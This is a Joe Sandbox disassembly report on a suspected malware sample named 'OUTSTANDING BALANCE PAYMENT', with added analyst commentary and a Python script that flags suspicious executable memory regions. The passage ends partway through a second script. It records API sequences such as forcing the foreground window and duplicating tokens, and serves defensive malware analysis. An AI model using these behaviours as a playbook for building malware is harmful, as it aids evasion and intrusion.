                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                  • Instruction Fuzzy Hash: 8931DA74A20106DBDF18DF58C480969FBBAFF49340B6686A5E409CB355DB31EDD1CBA0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: cddf11609ad2f43c8bb006cf82f111d2935c50c0ac9c96bf72a635c96a3732f6
                                                                  • Instruction ID: fa7f221194de064d28aebe2754482625d6a079ceb1bab39ff6ca1c1814af730c
                                                                  • Opcode Fuzzy Hash: cddf11609ad2f43c8bb006cf82f111d2935c50c0ac9c96bf72a635c96a3732f6
                                                                  • Instruction Fuzzy Hash: 0C417E745146068FDB24DF14C484B1ABBE0BF45348F1989ACE99A4B362C372FC95CF52
                                                                  APIs
                                                                    • Part of subcall function 00284214: FreeLibrary.KERNEL32(00000000,?), ref: 00284247
                                                                  • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002839FE,?,00000001), ref: 002841DB
                                                                    • Part of subcall function 00284291: FreeLibrary.KERNEL32(00000000), ref: 002842C4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Free$Load
                                                                  • String ID:
                                                                  • API String ID: 2391024519-0
                                                                  • Opcode ID: 7828da9fff670a33947c64794923d7b0a3aefc6450e867f6679c0038e37b149d
                                                                  • Instruction ID: 3c5f66d78d239057e5bbf82b21c7e5da9b480e51e2e03e721db198541bd870f5
                                                                  • Opcode Fuzzy Hash: 7828da9fff670a33947c64794923d7b0a3aefc6450e867f6679c0038e37b149d
                                                                  • Instruction Fuzzy Hash: 3911E735625207ABCB10FF70DC16FAE77A99F40700F108429F996A61C5DEB49A209F60
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: 6908bead84e554faee7ebcae05280f9e29c630f67b0d78c2e0dc63352d79fad6
                                                                  • Instruction ID: 867c7f8c72051738ef73a6ff9cd812a004fcca727692e82cc4e45060177447fc
                                                                  • Opcode Fuzzy Hash: 6908bead84e554faee7ebcae05280f9e29c630f67b0d78c2e0dc63352d79fad6
                                                                  • Instruction Fuzzy Hash: A5216970528206CFDB64DF24C484B1ABBE1BF89304F25496CE69A4B261C731F865CF92
                                                                  APIs
                                                                  • ___lock_fhandle.LIBCMT ref: 002AAFC0
                                                                    • Part of subcall function 002A7BDA: __getptd_noexit.LIBCMT ref: 002A7BDA
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit$___lock_fhandle
                                                                  • String ID:
                                                                  • API String ID: 1144279405-0
                                                                  • Opcode ID: 596a17698899a1ce8fbda39e9bf26f6e343f1cfba7f99fa7e42586ddf3c1c022
                                                                  • Instruction ID: 2214288142d9c50723ec9b06b83ca50548530d2fc3cfb8f21ad56993d7bdfcf8
                                                                  • Opcode Fuzzy Hash: 596a17698899a1ce8fbda39e9bf26f6e343f1cfba7f99fa7e42586ddf3c1c022
                                                                  • Instruction Fuzzy Hash: 70119A728396009FD7176FA49C4276A7AA1AF43335F2A4640E5345F1E3CFB48920CFA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                  • Instruction ID: 08b1d30a9b26d2eb7b2f7437143802dce7f89f8dbc0784ec883b42ed02810e38
                                                                  • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                  • Instruction Fuzzy Hash: 8F01623552110EEF8B04FF64C8918FEBB74AA11344F10812AA515971D5EA309A69CF60
                                                                  APIs
                                                                  • __lock_file.LIBCMT ref: 002A2AED
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2597487223-0
                                                                  • Opcode ID: f8ed488d2d8cdb15b0003cf571ed384e6c308a9ac2060c51c8023034e68b0548
                                                                  • Instruction ID: 9c2606bf084feafe40d950733375a58fe5c454cb58eba591b70a7705e2f57597
                                                                  • Opcode Fuzzy Hash: f8ed488d2d8cdb15b0003cf571ed384e6c308a9ac2060c51c8023034e68b0548
                                                                  • Instruction Fuzzy Hash: 58F0C231520216EBDF21AF688C067DF36A5BF02320F198415F8149A192CFB88A7ADF51
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,002839FE,?,00000001), ref: 00284286
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID:
                                                                  • API String ID: 3664257935-0
                                                                  • Opcode ID: c863906e69fbc1d60134a1850ba663b88c8fb8c62c7adc2467532e5040958475
                                                                  • Instruction ID: 2731fbdc8a497d762724c10a574aa69e8d7b0828656f9305b2a2284236f071f5
                                                                  • Opcode Fuzzy Hash: c863906e69fbc1d60134a1850ba663b88c8fb8c62c7adc2467532e5040958475
                                                                  • Instruction Fuzzy Hash: A2F0397952A703CFCB34BF64D890816BBE4BF043253248A3EF9D682659C7729860DF50
                                                                  APIs
                                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002840C6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: LongNamePath
                                                                  • String ID:
                                                                  • API String ID: 82841172-0
                                                                  • Opcode ID: d2146ee4b883f8b5a0be824738504a3a6e6053e4f6c3fc363b053bb00f1a955e
                                                                  • Instruction ID: d45ab38367a1643536f75528a3a109bfd76377db30840698b322c6f79a500903
                                                                  • Opcode Fuzzy Hash: d2146ee4b883f8b5a0be824738504a3a6e6053e4f6c3fc363b053bb00f1a955e
                                                                  • Instruction Fuzzy Hash: B4E0CD365002245FC711A694CC46FEA779DDF88790F050075F905D7245DD64D9818A90
                                                                  APIs
                                                                  • Sleep.KERNELBASE(000001F4), ref: 01227AB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2147125259.0000000001225000.00000040.00000020.00020000.00000000.sdmp, Offset: 01225000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1225000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                  • Instruction ID: b18a2d31494742287562fe3e566466f6482a9f9417bd4ad8cb0b5cf8c6429270
                                                                  • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                  • Instruction Fuzzy Hash: CEE0BF7494410DEFDB00DFE4D5496DD7BB4EF04311F1005A1FD05D7680DB309E548A62
                                                                  APIs
                                                                  • Sleep.KERNELBASE(000001F4), ref: 01227AB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2147125259.0000000001225000.00000040.00000020.00020000.00000000.sdmp, Offset: 01225000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1225000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                  • Instruction ID: 41f54338351962703ad5bfa795e50e99bd1db6b9bd0805a473ce649f3b703e16
                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                  • Instruction Fuzzy Hash: 5CE0E67494410DEFDB00DFF4D54969D7BB4EF04301F1001A1FD01D2280DB309E508A62
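The two Sleep records above differ from every other record in this section in one important way: their "Source File" is "based on PE: false" and lives at 01225000, outside the 00280000 image. The following script is an added triage helper, not part of the Joe Sandbox report or of the sample. It parses the dotted .sdmp names printed under "Memory Dump Source" and sorts regions by page protection and allocation type so the non-image, executable ones (where unpacked or injected code lives) stand out. Assumption, labelled in the code: the fifth dotted field is the VirtualQuery Protect value and the seventh the Type value; these are the documented winnt.h constants and they agree with every name in this report (PAGE_EXECUTE_READ/MEM_IMAGE for the .text region, PAGE_READWRITE/MEM_IMAGE for the data region, PAGE_EXECUTE_READWRITE/MEM_PRIVATE for the 01225000 region), but Joe Sandbox does not document the naming scheme and the remaining fields are treated as opaque. The sample lines are copied from this report.

```python
"""Classify Joe Sandbox memory-dump sources by protection and allocation type.

Added example; not part of the report or the analysed sample.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Documented Windows constants (winnt.h), not Joe Sandbox specific.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_IMAGE, MEM_MAPPED, MEM_PRIVATE = 0x1000000, 0x40000, 0x20000
MEM_TYPE = {MEM_IMAGE: "MEM_IMAGE", MEM_MAPPED: "MEM_MAPPED", MEM_PRIVATE: "MEM_PRIVATE"}
EXECUTABLE_MASK = 0xF0  # any of the four PAGE_EXECUTE* values

# ASSUMPTION: field 5 = Protect, field 7 = Type (VirtualQuery semantics).
# Fields 1-3, 6 and 8 are kept as opaque numbers.
SDMP_RE = re.compile(
    r"(?P<f1>[0-9A-Fa-f]{8})\.(?P<f2>[0-9A-Fa-f]{8})\.(?P<f3>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp"
)
SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)", re.I
)


@dataclass
class DumpRegion:
    name: str
    base: int
    protect: int
    mem_type: int
    offset: Optional[int] = None      # only present on "Source File" lines
    pe_backed: Optional[bool] = None  # the report's own "based on PE" flag

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, hex(self.mem_type))

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXECUTABLE_MASK)

    @property
    def suspicious(self) -> bool:
        # Executable memory that is neither an image mapping nor flagged as
        # PE-backed by the report: the usual home of unpacked/injected code.
        return self.executable and self.mem_type != MEM_IMAGE and not self.pe_backed


def parse_sdmp_name(name: str) -> DumpRegion:
    m = SDMP_RE.search(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    return DumpRegion(name=m.group(0), base=int(m.group("base"), 16),
                      protect=int(m.group("protect"), 16), mem_type=int(m.group("mtype"), 16))


def parse_source_line(line: str) -> DumpRegion:
    m = SOURCE_RE.search(line)
    if not m:
        raise ValueError(f"not a Source File line: {line!r}")
    region = parse_sdmp_name(m.group("name"))
    region.offset = int(m.group("offset"), 16)
    region.pe_backed = m.group("pe").lower() == "true"
    return region


def triage(report_text: str) -> List[DumpRegion]:
    """Distinct 'Source File' regions that look like non-image executable memory."""
    seen, flagged = set(), []
    for line in report_text.splitlines():
        if "Source File:" not in line:
            continue
        region = parse_source_line(line)
        if region.name not in seen:
            seen.add(region.name)
            if region.suspicious:
                flagged.append(region)
    return flagged


# Constructed input: four lines copied from this report.
SAMPLE = """\
• Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
• Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
• Source File: 00000000.00000002.2147125259.0000000001225000.00000040.00000020.00020000.00000000.sdmp, Offset: 01225000, based on PE: false
• Source File: 00000000.00000002.2147125259.0000000001225000.00000040.00000020.00020000.00000000.sdmp, Offset: 01225000, based on PE: false
"""

if __name__ == "__main__":
    for r in triage(SAMPLE):
        print(f"{r.base:08X} {r.protect_name} {r.type_name} pe_backed={r.pe_backed}")
```

Run against the whole report text rather than the sample and the output is the list of dump regions worth opening first; everything at 00280000 is the on-disk binary and, given the @GUI_DRAGID string and the AutoIt-style runtime routines in the records below, mostly interpreter code rather than the payload.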
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 002EF87D
                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002EF8DC
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 002EF919
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002EF940
                                                                  • SendMessageW.USER32 ref: 002EF966
                                                                  • _wcsncpy.LIBCMT ref: 002EF9D2
                                                                  • GetKeyState.USER32(00000011), ref: 002EF9F3
                                                                  • GetKeyState.USER32(00000009), ref: 002EFA00
                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002EFA16
                                                                  • GetKeyState.USER32(00000010), ref: 002EFA20
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002EFA4F
                                                                  • SendMessageW.USER32 ref: 002EFA72
                                                                  • SendMessageW.USER32(?,00001030,?,002EE059), ref: 002EFB6F
                                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 002EFB85
                                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 002EFB96
                                                                  • SetCapture.USER32(?), ref: 002EFB9F
                                                                  • ClientToScreen.USER32(?,?), ref: 002EFC03
                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002EFC0F
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 002EFC29
                                                                  • ReleaseCapture.USER32 ref: 002EFC34
                                                                  • GetCursorPos.USER32(?), ref: 002EFC69
                                                                  • ScreenToClient.USER32(?,?), ref: 002EFC76
                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 002EFCD8
                                                                  • SendMessageW.USER32 ref: 002EFD02
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 002EFD41
                                                                  • SendMessageW.USER32 ref: 002EFD6C
                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 002EFD84
                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 002EFD8F
                                                                  • GetCursorPos.USER32(?), ref: 002EFDB0
                                                                  • ScreenToClient.USER32(?,?), ref: 002EFDBD
                                                                  • GetParent.USER32(?), ref: 002EFDD9
                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 002EFE3F
                                                                  • SendMessageW.USER32 ref: 002EFE6F
                                                                  • ClientToScreen.USER32(?,?), ref: 002EFEC5
                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 002EFEF1
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 002EFF19
                                                                  • SendMessageW.USER32 ref: 002EFF3C
                                                                  • ClientToScreen.USER32(?,?), ref: 002EFF86
                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 002EFFB6
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 002F004B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                  • String ID: @GUI_DRAGID$F
                                                                  • API String ID: 2516578528-4164748364
                                                                  • Opcode ID: 65c9681b43d6cc3dbc16849823be891254e33001c7bb1fc7aaa0ba11a85d6c48
                                                                  • Instruction ID: 954141d022d591f907a9e089e665213da2a1d1404ec9c78102e1aae222c59416
                                                                  • Opcode Fuzzy Hash: 65c9681b43d6cc3dbc16849823be891254e33001c7bb1fc7aaa0ba11a85d6c48
                                                                  • Instruction Fuzzy Hash: B732FD74624286EFDB11CF64C980BAABBE8FF49344F540629FA95C72A1C731EC60CB51
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 002EB1CD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: %d/%02d/%02d
                                                                  • API String ID: 3850602802-328681919
                                                                  • Opcode ID: 211725662dc437f95f93e3ce999bd45dc830d4be2206eedc6a797c76c4e663c6
                                                                  • Instruction ID: 4b92c6daf0c65213e175ee1d5907261f699c4b9446a0f95ca69cbdc655d6a8c5
                                                                  • Opcode Fuzzy Hash: 211725662dc437f95f93e3ce999bd45dc830d4be2206eedc6a797c76c4e663c6
                                                                  • Instruction Fuzzy Hash: 2812FF71560249ABEB268F66CC59FAF7BF8FF45320F50411AF90ADA2D1DBB09811CB11
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(00000000,00000000), ref: 0029EB4A
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002F3AEA
                                                                  • IsIconic.USER32(000000FF), ref: 002F3AF3
                                                                  • ShowWindow.USER32(000000FF,00000009), ref: 002F3B00
                                                                  • SetForegroundWindow.USER32(000000FF), ref: 002F3B0A
                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002F3B20
                                                                  • GetCurrentThreadId.KERNEL32 ref: 002F3B27
                                                                  • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 002F3B33
                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 002F3B44
                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 002F3B4C
                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 002F3B54
                                                                  • SetForegroundWindow.USER32(000000FF), ref: 002F3B57
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 002F3B6C
                                                                  • keybd_event.USER32(00000012,00000000), ref: 002F3B77
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 002F3B81
                                                                  • keybd_event.USER32(00000012,00000000), ref: 002F3B86
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 002F3B8F
                                                                  • keybd_event.USER32(00000012,00000000), ref: 002F3B94
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 002F3B9E
                                                                  • keybd_event.USER32(00000012,00000000), ref: 002F3BA3
                                                                  • SetForegroundWindow.USER32(000000FF), ref: 002F3BA6
                                                                  • AttachThreadInput.USER32(000000FF,?,00000000), ref: 002F3BCD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 4125248594-2988720461
                                                                  • Opcode ID: ced217a7e321d22a36d23ccf737f921750babe650fcf1be0214559250105667f
                                                                  • Instruction ID: fb54d0410dca74fc49d376a364d053f292accab1cc699b4e49e9aec90bea2c13
                                                                  • Opcode Fuzzy Hash: ced217a7e321d22a36d23ccf737f921750babe650fcf1be0214559250105667f
                                                                  • Instruction Fuzzy Hash: CC31C671A5031CBFEB215FA58C59F7F7EACEB44B94F104026FB05EA1D0DAB15D10AAA0
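The record above is a recognisable sequence rather than a pile of unrelated calls: find the taskbar window (Shell_TrayWnd), attach to the foreground thread's input queue with AttachThreadInput, synthesise Alt presses with keybd_event(0x12 = VK_MENU), then call SetForegroundWindow. That is the standard workaround for the foreground-lock rules that would otherwise make SetForegroundWindow fail, and the same shape appears in the AutoIt runtime's window-activation code. The record further down that pairs LookupPrivilegeValueW / AdjustTokenPrivileges / DuplicateTokenEx with OpenWindowStationW(winsta0) and OpenDesktopW(default) is likewise a RunAs-style token and desktop setup. The script below is an added example, not part of the report or of the sample: it parses the report's "Api.MODULE(args), ref: addr" lines (including the indented "Part of subcall function" variant) and tags these combinations, decoding the virtual-key and Sleep arguments on the way. The pattern names, the interpretation of each combination and the 8-hex-digit argument convention are this example's own; sample lines are copied from this report.

```python
"""Tag API-call combinations in Joe Sandbox disassembly records.

Added example; not part of the report or the analysed sample. The
interpretation attached to each pattern is the analyst's, not Joe Sandbox's.
"""
import re
from typing import Dict, List, Optional

# "• Api.MODULE(args), ref: addr" or "• Api.MODULE ref: addr", optionally
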